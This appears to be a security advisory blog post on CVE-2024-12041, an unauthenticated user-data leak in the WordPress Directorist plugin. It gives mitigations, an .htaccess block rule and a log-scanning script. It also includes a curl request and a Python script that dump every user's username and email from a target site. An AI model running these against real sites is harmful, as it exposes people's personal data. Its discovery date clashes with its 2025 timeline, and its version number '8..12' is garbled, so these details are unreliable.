In February 2024, a serious vulnerability was discovered in the popular WordPress plugin Directorist: AI-Powered Business Directory with Classified Ads Listings. The flaw, tagged CVE-2024-12041, lets anyone on the internet—even people who aren’t logged in—extract sensitive details about your website’s users, such as emails, usernames, and real names. This guide gives you an exclusive, easy-to-follow rundown of what happened, how it works, and what you can do.

What’s Directorist?

Directorist is a widely used plugin, powering many business directories and classified ad sites on WordPress. Among other features, it lets you create and manage lists of registered users—making this security issue a particularly severe one for communities, businesses, and classified sites.

What's the Problem? (CVE-2024-12041 Details)

Directorist exposes a REST API endpoint available at /wp-json/directorist/v1/users/. This API endpoint is publicly accessible, meaning anyone can make requests to it—no authentication required.

Instead of limiting access to authenticated or privileged users, the endpoint returns detailed info about every user in the WordPress database—usernames, names, email addresses, and other metadata.

Vulnerable Endpoint Deep Dive

- Endpoint: /wp-json/directorist/v1/users/

Here’s a typical JSON response from the vulnerable endpoint:

[
  {
    "id": 3,
    "user_name": "johndoe",
    "name": "John Doe",
    "email": "john@example.com",
    "phone": "123-456-789",
    "registered": "2023-07-04 10:31:00",
    "role": "subscriber",
    // ... other potentially sensitive fields
  },
  {
    "id": 4,
    "user_name": "janedoe",
    "name": "Jane Doe",
    "email": "jane@example.com",
    "phone": "555-123-4567",
    "registered": "2023-08-12 14:15:00",
    "role": "author",
    // ...
  }
]

Exploitation – How Does It Work?

An attacker only needs a web browser, cURL, or common scripting tools. No login is necessary.

Example Exploit with cURL

curl -s "https://yourwordpresssite.com/wp-json/directorist/v1/users/"

Or a simple Python exploit that prints every user's username and email:

import requests

url = 'https://yourwordpresssite.com/wp-json/directorist/v1/users/'
resp = requests.get(url)

if resp.status_code == 200:
    users = resp.json()
    for user in users:
        print(f"User: {user['user_name']} - Email: {user['email']}")
else:
    print("Failed to fetch user data")

Who Reported It?

- Wordfence Advisory
- WordPress Plugin Directory - Plugin Page
- Packet Storm Security Entry

Official Response & Fix

As of this writing, version 8..12 remains vulnerable. The plugin authors are reportedly aware, and a patch may be released soon.

- Check for Updates: Always keep Directorist and WordPress core updated.

- Restrict API Access: Use a security plugin to block public access to /wp-json/directorist/v1/users/ until a patch is available.

- Block the endpoint using .htaccess (for Apache):

<If "%{REQUEST_URI} =~ m#^/wp-json/directorist/v1/users/#">
    Require all denied
</If>

- Add a custom firewall rule blocking /wp-json/directorist/v1/users/
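To find out whether the endpoint was queried before you blocked it, the added example below (not code from the plugin or the original article) scans access-log lines for successful requests to the users route and groups them by client IP. It assumes the combined log format and WordPress installed at the web root; the function names are hypothetical, the log lines are constructed samples, and it also matches the `rest_route` query form that WordPress accepts for REST requests that do not go through /wp-json/.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

ROUTE = "/directorist/v1/users"  # REST route named in the article

# Combined log format, WordPress at the web root (both are assumptions)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def rest_route(target):
    """Return the REST route a request target resolves to, or None."""
    parts = urlsplit(target)
    if parts.path.startswith("/wp-json/"):
        return parts.path[len("/wp-json"):]
    # WordPress also accepts the route as ?rest_route=/... on index.php
    routes = parse_qs(parts.query).get("rest_route")
    return routes[0] if routes else None

def find_user_dumps(lines):
    """Group successful (2xx) hits on the users route by client IP."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not m["status"].startswith("2"):
            continue
        route = (rest_route(m["target"]) or "").rstrip("/")
        if route == ROUTE or route.startswith(ROUTE + "/"):
            size = 0 if m["size"] == "-" else int(m["size"])
            hits[m["ip"]].append((m["ts"], size))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges), not real traffic
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Feb/2025:10:01:12 +0000] "GET /wp-json/directorist/v1/users/ HTTP/1.1" 200 48213 "-" "curl/8.5.0"',
    '203.0.113.7 - - [02/Feb/2025:10:01:15 +0000] "GET /?rest_route=/directorist/v1/users/ HTTP/1.1" 200 47100 "-" "curl/8.5.0"',
    '198.51.100.4 - - [02/Feb/2025:11:30:00 +0000] "GET /wp-json/directorist/v1/users/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [02/Feb/2025:12:00:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_user_dumps(SAMPLE_LOG).items():
        total = sum(size for _, size in events)
        print(f"{ip}: {len(events)} successful request(s), {total} bytes")
```

Any IP reported here received a 2xx response from the users route, so treat the listed user data as disclosed to that client; the 403 line shows what a working block looks like in the log.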

Final Thoughts

WordPress REST API vulnerabilities are nothing new—but because plugins like Directorist directly manage sensitive data, issues like CVE-2024-12041 have a huge impact. Anyone using Directorist should take action immediately to protect their users and their website’s reputation.


*Protect your site, protect your users—patch fast or block now.*

Timeline

Published on: 02/01/2025 06:15:29 UTC
Last modified on: 02/24/2025 16:05:18 UTC